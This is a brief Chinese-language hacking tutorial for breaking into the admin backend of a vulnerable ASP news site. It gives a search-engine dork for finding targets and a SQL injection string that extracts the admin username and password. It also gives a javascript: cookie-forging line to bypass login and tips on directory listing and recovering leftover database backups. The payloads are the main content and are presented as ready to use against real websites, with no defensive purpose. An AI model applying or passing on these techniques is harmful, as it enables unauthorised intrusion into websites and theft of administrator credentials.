作者:夜冷 | 来源:互联网 | 2017-11-11 17:16
利用cokiess欺骗进管理后台,google关键字inurl:news_more.asp?lm21.adminadmin_news_pl_view.asp?+dfirst([user],[admin])+chr(124)+dfirst([pass],[admin]),use
利用cokiess欺骗进管理后台,google关键字inurl:news_more.asp?lm2=
1.
/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
2. 有时1显示错误信息的时候继续往后退2,3,4。。。。
3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
4. Javascript:alert(document.COOKIE="adminuser=" + escape("admin"));alert(document.COOKIE="adminpass=" + escape("改这里"));
5 修改以上COOKIEs 欺骗进后台~
一般/login.asp 在admin的同级目录的时候可以用到,其他的讯时用以前的三板斧就行了,有个eweb可以列目录的~
后台有备份的 没备份的时候浏览器上试试文件 打开 直接写备份名,有的只是把备份名去掉了 文件还在的。。。